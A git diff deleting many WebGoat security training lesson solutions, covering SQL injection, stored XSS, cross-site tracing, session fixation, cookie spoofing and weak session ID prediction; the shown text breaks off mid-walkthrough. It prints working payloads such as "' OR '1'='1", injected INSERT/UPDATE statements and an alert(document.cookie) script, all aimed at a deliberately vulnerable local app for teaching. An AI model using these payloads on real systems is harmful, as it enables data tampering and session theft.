Applications -will often have an administrative interface that allows privileged users access -to functionality that normal users shouldn't see. The application server will -often have an admin interface as well.

- -

 

- -

General -Goal(s):

- -

Try to access -the administrative interface for WebGoat. You may also try to access the -administrative interface for Tomcat. The Tomcat admin interface can be accessed -via a URL (/admin) and will not count towards the completion of this lesson.

- -

 

- -

- -

Figure 1 Lesson 7

- -

 

- -

Solution:

- -

 

- -

Append &admin=true to the URL in the -browser and hit "Enter"

- -

 

- -

Open the menu -"Admin functions" and notice that you have additional menu options like -"Database Dump", "User Information" and "Product Information".

- -

 

- -

- -

Figure 2 Some extra admin functions

- -

 

- -

Clicking on -"User Information" will not work. This is because the URL behind "User -Information" is http://localhostattack?Screen=71&menu=10 -does not contain the parameter admin=true. Rewrite the URL to become http://localhostattack?Screen=71&menu=10&admin=true

- -

 

- -

Remark: the parameter Screen is generated -randomly and can be different in your environment!

- -

 

- -

- -

Figure 3 Lesson 7 Completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/SameOriginPolicyProtection.html b/src/main/webapp/lesson_solutions_1/SameOriginPolicyProtection.html deleted file mode 100644 index 59fac9fa5..000000000 --- a/src/main/webapp/lesson_solutions_1/SameOriginPolicyProtection.html +++ /dev/null @@ -1,641 +0,0 @@ - - - - - - - -Solution: Same Origin Policy Protection - - - - - - - - - -
- -

Lesson -Plan Title: Same Origin Policy Protection.

- -

 

- -

Concept / -Topic To Teach:

- -

A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous calls from the client side to a server. However, as a security measure these requests may only be made to the server from which the client page originated.

- -  - -

General -Goal(s):

- -

- -

This exercise demonstrates the Same Origin Policy Protection. XHR requests can only be passed back to the originating server. Attempts to pass data to a non-originating server will fail.
- -

-  - -

Solution:

- -

Click both of the links on the page to see their behavior and complete the lesson.

- -   - - -

 

- -
- - - - diff --git a/src/main/webapp/lesson_solutions_1/SessionFixation.html b/src/main/webapp/lesson_solutions_1/SessionFixation.html deleted file mode 100644 index 96310ab6e..000000000 --- a/src/main/webapp/lesson_solutions_1/SessionFixation.html +++ /dev/null @@ -1,121 +0,0 @@ - - - - -Session Fixation - - - -

Lesson Plan Title: Session Fixation

- -

Concept / Topic To Teach:
-How to steal a session with a 'Session Fixation' -

- -

How the attacks works:
-A user is recognized by the server by an unique -Session ID. If a user has logged in and is authorized -he does not have to reauthorize when he revisits the -application as the user is recognized by the Session ID. - In some applications it is possible to deliver the Session - ID in the Get-Request. Here is where the attack starts. -

-

An attacker can send a hyperlink to a - victim with a chosen Session ID. This can be - done for example by a prepared mail which looks like an -official mail from the application administrator. If the victim - clicks on the link and logs in he is authorized by the - Session ID the attacker has chosen. The attacker can visit - the page with the same ID and is recognized as the victim - and gets logged in without authorization.

- -

General Goal(s):
-This lesson has several stages. You play the attacker but -also the victim. After having done this lesson it should be - understood how a Session Fixation in general works. It should - be also understood that it is a bad idea to use the Get-Request - for Session IDs. - -

- -

-Solution:
-This lesson has 4 stages. In stage 1 and 4 you are Hacker Joe -in lesson 2 and 3 you are the victim Jane. - -

-Stage 1:
-You have to send a prepared mail to Jane which looks like a mail from Goat Hills Financial with a link containing a Session ID. -The mail is already prepared. You only have to alter the link so it includes -a Session ID (SID). You can archive this by adding &SID=WHATEVER to -the link. Of course can WHATEVER be replaced by any other string. -The link should look similar to following:
-<a href=http://localhostattack?Screen=46&menu=320&SID=WHATEVER> -

-
-
-Figure 1: Prepared Mail -
-
- -

-Stage 2:
-Now you are Jane which receives the mail you wrote in stage 1. -Point with the mouse on the link and you will notice the -SID in the status bar of your browser. This is the easiest -stage as you have only to click on the link 'Goat Hills Financial'. -

-
-
-Figure 2: Received Mail -
-
- - -

-Stage 3:
-You are on the login screen of Goat Financial Hills now. In -the URL is the SID visible. All -you have to do is to log in with your user name Jane -and your password tarzan. -

-
-
-Figure 3: Goat Hills Financial Login Screen -
-
- -

-Stage 4:
-The application switches again to the hacker Joe. -There is already a prepared link you have to click on -to reach the Goat Hill Financial. In real life this -would be different of course. You could directly put the URL -in the address bar of your browser.

- - -After having clicked on the provied link you reach -Goat Hill Financial. Take a look at the URL and -you will see that your SID is NOVALIDSESSION. -Change this string to the SID you have chosen -at the beginning of this lesson and hit enter.

-
-
-Figure 4: Browser Address Bar Before Changes -

-
-Figure 5: Browser Address Bar After Changes -
-
-

-Congratulation! You are logged in as Jane -and the lesson was successful. -
-
-Figure 6: Successful Completion Of The Lesson -
-
- - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/SilentTransactions.html b/src/main/webapp/lesson_solutions_1/SilentTransactions.html deleted file mode 100644 index da814a15d..000000000 --- a/src/main/webapp/lesson_solutions_1/SilentTransactions.html +++ /dev/null @@ -1,931 +0,0 @@ - - - - - - - -Solution: Silent Transcations Attacks - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform Silent Transactions Attacks.

- -

 

- -

Concept / -Topic To Teach:

- -

This lesson -teaches how to perform silent transactions attacks.

- -

 

- -

How the -attacks works:

- -

Any system that -silently processes transactions using a single submission is dangerous to the -client. For example, if a normal web application allows a simple URL -submission, a preset session attack will allow the attacker to complete a -transaction without the user's authorization. In Ajax, it gets worse: the -transaction is silent; it happens with no user feedback on the page, so an -injected attack script may be able to steal money from the client without -authorization.

- -

 

- -

General -Goal(s):

- -

This is a -sample internet banking application - money transfer page.

- -

It shows -below your balance, the account you are transferring to and amount you will -transfer.
-The application uses AJAX to submit the transaction after doing some basic -client side validations.
-Your goal is to try to bypass the user's authorization and silently execute the -transaction.
-
-

- -

- -

Figure 1 AJAX Security - Silent transaction attacks

- -

 

- -

Solution:

- -

This web -application uses JavaScript on the client to initiate a transaction for -transferring money. Examining the HTML source reveals that two JavaScript -functions are being used:

- -

 

-

<script>

- -

function -processData(){

- -

 var accountNo = -document.getElementById('newAccount').value;

- -

 var amount = -document.getElementById('amount').value;

- -

 if ( accountNo == ''){

- -

 alert('Please enter a valid account number to -transfer to.')

- -

 return;

- -

}

- -

 else if ( amount == ''){

- -

 alert('Please enter a valid amount to -transfer.')

- -

 return;

- -

}

- -

 var balanceValue = -document.getElementById('balanceID').innerText;

- -

 balanceValue = balanceValue.replace( new -RegExp('$') , '');

- -

 if ( parseFloat(amount) > -parseFloat(balanceValue) ) {

- -

 alert('You can not transfer more funds than -what is available in your balance.')

- -

 return;

- -

}

- -

 document.getElementById('confirm').value  = 'Transferring'

- -

submitData(accountNo, -amount);

- -

 document.getElementById('confirm').value  = 'Confirm'

- -

balanceValue -= parseFloat(balanceValue) - parseFloat(amount);

- -

balanceValue -= balanceValue.toFixed(2);

- -

document.getElementById('balanceID').innerText -= balanceValue + '$';

- -

}

- -

function -submitData(accountNo, balance) {

- -

var url = -'attack?Screen=74&menu=1150&from=ajax&newAccount='+ -accountNo+ '&amount=' + balance +'&confirm=' + -document.getElementById('confirm').value;

- -

if (typeof -XMLHttpRequest != 'undefined') {

- -

req = new -XMLHttpRequest();

- -

} else if -(window.ActiveXObject) {

- -

req = new -ActiveXObject('Microsoft.XMLHTTP');

- -

   }

- -

   req.open('GET', url, true);

- -

   req.onreadystatechange = callback;

- -

   req.send(null);

- -

}

- -

function -callback() {

- -

    if (req.readyState == 4) {

- -

        if (req.status == 200) {

- -

                   var result =  req.responseText ;

- -

                                     var resultsDiv = -document.getElementById('resultsDiv');

- -

                                                resultsDiv.innerHTML = '';

- -

                                                resultsDiv.innerHTML -= result;

- -

        }}}

- -

</script>

-

 

- -

The function -processData() is called when the user fills out an account number and an amount -to transfer. The function processData() will check if the user has sufficient -balance before initiating the transaction. After validation of the balance, the -JavaScript function submitData(accountNo, balance) is called which actually -submits the required information, target account number and the amount to -transfer, to the back-end web application.

- -

 

- -

If you are -able to call this JavaScript function submitData(accountNo, balance) from the -browser, you are able to bypass the client-side validation and execute this -transaction silently, without an additional approval or digital signature of -the user.

- -

 

- -

The latest -generation of browsers allows to call JavaScript from the address bar, using -javascript:function();. Try to execute: javascript:submitData(1234556,11000);

- -

 

- -

- -

Figure 2 Follow the hints....

- -

 

- -

- -

Figure 3 HTTP Request generated from Javascript function -submitData(123456,110000);

- -

 

- -

 

- -

- -

Figure 4 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/SoapRequest.html b/src/main/webapp/lesson_solutions_1/SoapRequest.html deleted file mode 100644 index 72b3257e3..000000000 --- a/src/main/webapp/lesson_solutions_1/SoapRequest.html +++ /dev/null @@ -1,879 +0,0 @@ - - - - - - - -Solution: Create a SOAP Request - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Create a SOAP Request

- -

 

- -

Concept / -Topic To Teach:

- -

Web -Services communicate through the use of SOAP requests. These requests are -submitted to a web service in an attempt to execute a function defined in the -web service definition language (WSDL). Let's learn something about WSDL files. -Check out WebGoat's web service description language (WSDL) file.

- -

 

- -

General -Goal(s):

- -

Try -connecting to the WSDL with a browser or Web Service tool. The URL for the web -service is: http://localhostservices/SoapRequest The WSDL can usually -be viewed by adding a ?WSDL on the end of the web service request.

- -

 

- -

- -

Figure 1 - Lesson 21

- -

 

- -

Solution:

- -

 

- -

Click on the -URL "WebGoat WSDL" to examine the Webservices Description Language file.

- -

 

- -

- -

Figure 2 - WSDL

- -

 

- -

Count the -number of operations like getFirstName. There are 4 operations defined.

- -

 

- -

- -

Figure 3 Enter the ID

- -

 

- -

For the next -question the getFirstNameRequest method uses an int as parameter type. Enter -int and click "Submit".

- -

 

- -

- -

Figure 4 Stage 2 Completed

- -

 

- -

Intercept the -HTTP Request with WebScarab and click on the “Raw” tab. Make sure that -“Intercept Responses” is selected.

- -

 

- -
    -
  1. Change the POST header to open - the SoapRequest:
    - POST http://localhost/WebGoat/services/SoapRequest HTTP/1.1 (This will vary based on which ports you are using)
  2. -
  3. Change the Content-Type to - text/xml:
    - Content-Type: text/xml
  4. -
  5. Add a header SOAPAction.
    - SOAPAction: (No value needs to be specified for this header)
  6. -
  7. Append the XML envelope to the - request:
  8. -
- -

<?xml -version="1.0" encoding="UTF-8"?>

- -

<SOAP-ENV:Envelope -xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"

- -

xmlns:xsd="http://www.w3.org/2001/XMLSchema" -

- -

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> -

- -

  <SOAP-ENV:Body>

- -

    <ns1:getFirstName -SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" -xmlns:ns1="http://lessons">

- -

    <id -xsi:type="xsd:int">101</id>

- -

    -</ns1:getFirstName> -

- -

  </SOAP-ENV:Body>

- -

</SOAP-ENV:Envelope>

- -


It is important that there is no whitespace (carriage returns or spaces) from the SOAPAction header to the opening XML tag. This generates an error instead of the desired response.

- -

 

- -

- -

Figure 5 Updated HTTP request with SOAP parameters

- -

 

- -

The response -is Joe.

- -

- -

Figure 6 Intercept response

- -

 

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/SqlAddData.html b/src/main/webapp/lesson_solutions_1/SqlAddData.html
deleted file mode 100644
index 5e0ba4aba..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlAddData.html
+++ /dev/null
@@ -1,43 +0,0 @@
- - - - -Solution: Modify Data with SQL - - - -

Lesson Plan Title: Add Data with SQL

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. -

-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-

- -

General Goal(s):
-The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to add a record to the table. -

- -Solution:

-In this lesson, we will use the INSERT query, which uses the format:
-INSERT INTO table VALUES (value1, value2);

-In this case, the salaries table has two relevant columns: column 1 is userid, and column 2 is salary. -We will use the command:
-INSERT INTO salaries VALUES ('rlupin',140000);

-This, however, will not work correctly. We are inserting this in between two single quotes in the command:
-SELECT * FROM salaries WHERE userid='userid';

-If we treated this lesson as we have treated the previous one, our command would look like this:
-SELECT * FROM salaries WHERE userid='whatever'; INSERT INTO salaries VALUES ('rlupin',150000);'

-The statement cannot end with a single quote after the semicolon, so we must comment out the quote using --.
-To complete this lesson, type the following into the field and press go:
-whatever'; INSERT INTO salaries VALUES ('rlupin',140000);--

-If you then search for the userid rlupin, you will see there is new record.

- -
-New employee record after using an INSERT query.


- - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/SqlModifyData.html b/src/main/webapp/lesson_solutions_1/SqlModifyData.html
deleted file mode 100644
index 90594689a..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlModifyData.html
+++ /dev/null
@@ -1,39 +0,0 @@
- - - - -Solution: Modify Data with SQL - - - -

Lesson Plan Title: Modify Data with SQL

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. -

-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-

- -

General Goal(s):
-The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith. -

- -Solution:

-In this lesson, instead of using the SELECT query command, we use the UPDATE command, which uses the format:
-UPDATE table SET column=value WHERE column=value;

-We need to update the table salaries, setting the salary column to a new number.
-We will use the command:
-UPDATE salaries SET salary=999999 WHERE userid='jsmith'

-We also need to end the previous query and leave our last quote open to make a valid statment.
-To complete this lesson, type the following into the field and press go:
-whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith

-If you then search for the userid jsmith, you will see the salary has been updated.

- -
-Updated salary after using a MODIFY query.


- - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html b/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html
deleted file mode 100644
index f46d061d1..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html
+++ /dev/null
@@ -1,682 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to Perform Numeric SQL Injection

- -

 

- -

Concept / -Topic To Teach:

- - -

-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. - -Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented. - -It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.

-

 

-

General -Goal(s):

- -

-The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed. - -

- -

 

- -

Solution:

- -

 

- - -

 

- -

The -application is taking the input from the select box and inserting it at the end of a pre-formed -SQL command.

- -

Compound SQL -statements can be made by joining multiple tests with keywords like AND and OR. -Try appending a SQL statement that always resolves to true.

- -

 

- -

This is the -query: SELECT * FROM weather_data WHERE station = 101

- -

 

- -

Intercept the post request with WebScarab and replace 101 with 101 or 1=1!

- -

 

- - - - -

Figure 1 Intercepted Request with WebScarab

- -
-
-

As the SQL Statement is true for every station you get -a list of all stations:

- - - - - -

Figure 2 All stations are visible

- - -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/SqlStringInjection.html b/src/main/webapp/lesson_solutions_1/SqlStringInjection.html
deleted file mode 100644
index 725648e08..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlStringInjection.html
+++ /dev/null
@@ -1,716 +0,0 @@
- - - - - - - -Solution: SQL String Injection - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform String SQL Injection

- -

 

- -

Concept / -Topic To Teach:

- - - -

SQL injection -attacks represent a serious threat to any database-driven site. The methods -behind an attack are easy to learn and the damage caused can range from -considerable to complete system compromise. Despite these risks, an incredible -number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a -little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that -will used in OS command, scripts, and database queries, even if the threat of -SQL injection has been prevented in some other manner.

- -

 

- -

General -Goal(s):

- -

The form -below allows a user to view their credit card numbers. Try to inject an SQL -string that results in all the credit card numbers being displayed. Try the -user name of 'Smith'.

- -

 

- -

Solution:

- -

 

- -

Compared with -the previous lesson, there is now a string parameter and not an integer.

- -

Strings must be -terminated with single quotes to have a valid SQL Query.

- -

 

- -

- -

Figure 1 Lesson 18

- -

 

- -

The query -used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'

- -

 

- -

Enter for the -last name value: Erwin' OR '1'='1

- -

 

- -

- -

Figure 2 Lesson 18 Completed

- -

 

- -
-
- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/StoredXss.html b/src/main/webapp/lesson_solutions_1/StoredXss.html
deleted file mode 100644
index a84fc2b40..000000000
--- a/src/main/webapp/lesson_solutions_1/StoredXss.html
+++ /dev/null
@@ -1,711 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

Lesson Plan Title: How to Perform Stored Cross Site -Scripting (XSS)

- -

 

- -

Concept / Topic To Teach:

- -

It is always a -good practice to scrub all inputs, especially those inputs that will later be -used as parameters to OS commands, scripts, and database queries. It is -particularly important for content that will be permanently stored somewhere. -Users should not be able to create message content that could cause another -user to load an undesirable page or undesirable content when the user's message -is retrieved.

- -

 

- -

General Goal(s):

- -

The user -should be able to add message content that cause another user to load an -undesirable page or content.

- -

 

- -

- -

Figure 1 Lesson 14

- -

 

- -

Solution:

- -

 

- -

Enter this: <script language="javascript" -type="text/javascript">alert("Ha Ha Ha");</script> in the message text -box.

- -

- -

Figure 2 Stored message

- -

 

- -

- -

Figure 3 Lesson 14 nearly completed

- -

 

- -

Now enter this: <script language="javascript" -type="text/javascript">alert(document.cookie);</script> in the message text -box. You will get your SessionId in a popup.

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/ThreadSafetyProblem.html b/src/main/webapp/lesson_solutions_1/ThreadSafetyProblem.html
deleted file mode 100644
index 4ffede86b..000000000
--- a/src/main/webapp/lesson_solutions_1/ThreadSafetyProblem.html
+++ /dev/null
@@ -1,670 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

 

- -

Lesson -Plan Title: How to -Exploit Thread Safety Problems

- -

 

- -

Concept / -Topic To Teach:

- -

Web -applications can handle many HTTP requests simultaneously. Developers often use -variables that are not thread safe.  Thread safety means that the fields -of an object or class always maintain a valid state when used concurrently by -multiple threads. It is often possible to exploit a concurrency bug by loading -the same page as another user at the exact same time.
-Because all threads share the same method area, and the method area is where -all class variables are stored, multiple threads can attempt to use the same -class variables concurrently.

- -

 

- -

General -Goal(s):

- -

The user -should be able to exploit the concurrency error in the web application and view -login information for another user that is attempting the same function at the -same time.

- -

 

- -

This will -require the use of two browser windows.

- -

 

- -

- -

Figure 1 Lesson 2

- -

 

- -

Solution:

- -

 

- -

Open a new -browser window by pressing CTRL-N. Position the window so that you see both -input fields. Enter user name "dave" in the left window and user name "jeff" in -the right window.

- -

Click very -fast on the submit button in the right window and then in the left window.

- -

 

- -

- -

Figure 2 2 Browser Windows

- -

 

- -

The result -should be that you receive the same data in both windows, even when using a -different user name!

- -

- -

Figure 3 Lesson 2 Completed

- -

 

- -

The root-cause -of this exploit is that the Java code uses a static variable for the user name. -When submitting twice, the same thread and hence the same static variable -containing the username of the first request will be used.

- -

This is -obvious when examining the Java code:

- -

 

- -

private -static String currentUser;

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/TraceXSS.html b/src/main/webapp/lesson_solutions_1/TraceXSS.html
deleted file mode 100644
index 502acdd17..000000000
--- a/src/main/webapp/lesson_solutions_1/TraceXSS.html
+++ /dev/null
@@ -1,685 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform Cross Site Tracing (XST) Attacks

- -

 

- -

Concept / -Topic To Teach:

- -

It -is always a good practice to scrub all input, especially those inputs that will -later be used as parameters to OS commands, scripts, and database queries. It -is particularly important for content that will be permanently stored somewhere -in the application. Users should not be able to create message content that -could cause another user to load an undesireable page or undesireable content -when the user's message is retrieved.

- -

 

- -

General -Goal(s):

- -

Tomcat is -configured to support the HTTP TRACE command. Your goal is to perform a Cross -Site Tracing (XST) attack.

- -

 

- -

Solution:

- -

 

- -

You need to -introduce a cross site trace attack. This can be realized by embedding the -following script in the three digit access code.

- -

 

- -

<script -type="text/javascript">if ( navigator.appName.indexOf("Microsoft") -!=-1) {var xmlHttp = new -ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", -"./", false); xmlHttp.send();str1=xmlHttp.responseText; while -(str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); -document.write(str1);}</script>

- -

 

- -

- -

Figure 1 Lesson 15

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/UncheckedEmail.html b/src/main/webapp/lesson_solutions_1/UncheckedEmail.html
deleted file mode 100644
index 8ea6ca3e4..000000000
--- a/src/main/webapp/lesson_solutions_1/UncheckedEmail.html
+++ /dev/null
@@ -1,672 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

Lesson Plan Title: How to Exploit Unchecked Email

- -

 

- -

Concept / Topic To Teach:

- -

It is always -a good practice to validate all inputs. Most sites allow non-authenticated users -to send e-mail to a 'friend'. This is a great mechanism for spammers to send -out email using your corporate mail server.

- -

 

- -

General Goal(s):

- -

The user -should be able to send an obnoxious email message.

- -

 

- -

Solution:

- -

Type a -malicious script like <script>alert("XSS")</script> and click Send!

- -

 

- -

- -

Figure 1 Lesson 5

- -

 

- -

 

- -

 

- -

- -

Figure 2 Part 1 completed

- -

 

- -

The second -part of this lesson is to send a mail to a friend from OWASP. This can be -accomplished by intercepting the request with WebScarab and changing the hidden -field "to" from webgoat.admin@owasp.org -to bill.gates@microsoft.com

- -

 

- -

- -

Figure 3 Change the variable to another e-mail -address

- -

 

- -

- -

Figure 4 Lesson 5 Completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/WSDLScanning.html b/src/main/webapp/lesson_solutions_1/WSDLScanning.html
deleted file mode 100644
index b39269ea1..000000000
--- a/src/main/webapp/lesson_solutions_1/WSDLScanning.html
+++ /dev/null
@@ -1,724 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform WSDL Scanning

- -

 

- -

Concept / -Topic To Teach:

- -

Web -Services communicate through the use of SOAP requests. These requests are -submitted to a web service in an attempt to execute a function defined in the -web service definition language (WSDL) file.

- -

 

- -

General -Goal(s):

- -

This screen -is the API for a web service. Check the WSDL file for this web service and try -to get some customer credit numbers.

- -

 

- -

- -

Figure 1 Lesson 22

- -

 

- -

Solution:

- -

 

- -

Open the WSDL -file in a new window. There is an operation getCreditCard.

- -

 

- -

- -

 

- -

Intercept the -request with WebScarab and change the parameter to getCreditCard

- -

 

- -

- -

Figure 2 WebScarab raw request

- -

 

- -

- -

Figure 3 Lesson 22 Completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/WeakAuthenticationCookie.html b/src/main/webapp/lesson_solutions_1/WeakAuthenticationCookie.html
deleted file mode 100644
index 926440486..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,915 +0,0 @@
- - - - - - - -Solution: Spoof an Authentication Cookie - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Spoof an Authentication Cookie

- -

 

- -

Concept / Topic To Teach:

- - - -

Many -applications will automatically log a user into their site if the right -authentication cookie is specified.   Some times the cookie values can be -guessed if the algorithm for generating the cookie can be obtained.  Some -times the cookies are left on the client machine and can be stolen by -exploiting another system vulnerability.  Some times the cookies maybe -intercepted using Cross site scripting.  This lesson tries to make the -student aware of authentication cookies and presents the student with a way to -defeat the cookie authentication method in this lesson.
-
-

- - - -

General Goal(s):

- -

The user -should be able to bypass the authentication check.

- -

 

- -

Solution:

- -

 

- -

Make sure -that you have "Show Cookies" enabled in WebGoat. And you need to disable the -feature "Inject know cookies into requests" in WebScarab otherwise WebScarab -will always inject your old cookie and not the new cookie.

- -

 

- -

- -

Figure 1 Disable "Inject known cookies into -requests"

- -

 

- -

- -

Figure 2 Logon with webgoat/webgoat

- -

 

- -

You can login -with webgoat/webgoat.

- -

 

- -

- -

Figure 3 Logged on as webgoat

- -

 

- -

Hit -"Refresh". This refresh will show our AuthCookie. And you are now authenticated -using this cookie and not with parameters like above.

- -

 

- -

- -

 

- -

There is a -new cookie called AuthCookie with values 65432ubphcfx. Logout and login with -aspect/aspect.

- -

 

- -

- -

Figure 4 Logon as aspect/aspect

- -

 

- -

- -

Figure 5 Logged on as aspect

- -

 

- -

Hit "Refresh" -to see the new cookie.

- -

 

- -

- -

Figure 6 Cookie for user aspect

- -

 

- -

You have now -a different cookie value for AuthCookie: 65432udfgfb

- -

 

- - - - - - - - - - -
-

webgoat

-
-

ubphcfx

-
-

Aspect

-
-

udfgfb

-
- -

 

- -

This is an transposition -of the letters of the alphabet. Each letter is replaced with its successor, for -example t->u, a->b and the user name is reversed. So for user name alice the cookie will -contain the reversed user name ecila and the successors of the letters. This -results in fdjmb.

- -

 

- -

Login with -user name alice -and intercept the request in WebScarab. Add AuthCookie=65432fdjmb to the -existing cookie JSESSIONID.

- -

 

- -

 

- -

 

- -

- -

Figure 7 Add AuthCookie to request

- -

 

- -

- -

Figure 8 Lesson 11 Completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID.html b/src/main/webapp/lesson_solutions_1/WeakSessionID.html
deleted file mode 100644
index 2bfff1bc5..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID.html
+++ /dev/null
@@ -1,90 +0,0 @@
- - - - -Solution: How to Hijack a Session - - - -

Lesson Plan Title: How to Hijack a Session

- -

Concept / Topic To Teach:
-Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks. -

- -

General Goal(s):
-Try to access an authenticated session belonging to someone else.

-In this lesson we are trying to predict the WEAKID value. THe WEAKID is used to differentiate authenticated and anonymous users of WebGoat. -

- -Solution:

-The easiest way to complete this lesson is to use WebScarab's Session ID Analysis feature. The Solution Videos provide another method of uncovering it as well.

-To access the Session ID Analysis, you need to put WebScarab in its full-featured mode, if it isn't already. This can be enabled by going to Tools -> use full-featured interface in WebScarab.
-Click on the SessionID Analysis tab at the top of the page, then use the Previous Requests dropdown to select the most recent GET request with a 200 OK header. Its address will end with webgoat/attack, not an image or java file.

- -
-Selecting the correct GET request for Session ID analysis.

- -Next, we need to make sure that WebScarab is able to fetch the WEAKID cookie. Click the Test button at the bottom of the page. You should get a popup window showing the WEAKID.

- -
-Succesful WEAKID test popup.

- -If the popup indicates that no valid session is found, that means there is already a WEAKID value in the request. This prevents the "Set-Cookie" header from being sent in the response. To fix this, delete the WEAKID=value; portion of the Cookie header and press test again.

- -Now we need to fetch a set of WEAKIDs. Enter "50" into the Samples field at the bottom of the window, then press Fetch. Switch to the "Analysis" tab. Select the WEAKID option from the Session Identifier dropdown, and the window should populate with WEAKID values.

- -The WEAKID is divided into two parts: the first part before the dash is an identifier that increases by 1 in each cookie, and the part after the dash is a time value that is calculated when the request is submitted.
-Notice that there is sometimes a gap in the first value of the WEAKID, where one number is skipped. The missing value is what we need to log in, we just need to figure out the time stamp value that goes after the dash.

-It's simple to spot where this value is. Look at the "Difference" column on the analysis screen. Almost all of the values will be only one or two apart. We are looking for the record where this value is around double the rest of them.

- -
-Analysis screen with the cookie of interest highlighted.

- -This WEAKID follows the one we're trying to find. You will notice the identifier of the cookie preceding the highlighted one is two less, whereas all the other cookies decrease only by one. The one missing is what we want to find:
-16964-1312472439375
-16966-1312472439484

-The WEAKID beginning with 16965 is missing. This is the WEAKID we want, we just need to figure out the second part.
- -We'll figure this out by using the brute force method. We will send requests with each possible timestamp value until we find one that is successful. Its timestamp must be between the two surrounding it:
-16964-1312472439375
-16965-?????????????
-16966-1312472439484

- -So our timestamp is between 1312472439375 and 1312472439484. Now we just need a program to do brute force this for us. We will use J-Baah, previously known as Crowbar. Download it and run the .jar.

-We will configure J-Baah to send our request repeatedly, with a different WEAKID each time. Copy our RAW HTTP Request we used to generate these cookies, found under the Collection tab. Paste it in the Request box in J-Baah.

- -The WEAKID paramter needs to be put into the request. It will begin with the missing value we figured out before the dash, 16965 in our case. How do we fill in the rest when we dont know what it is?
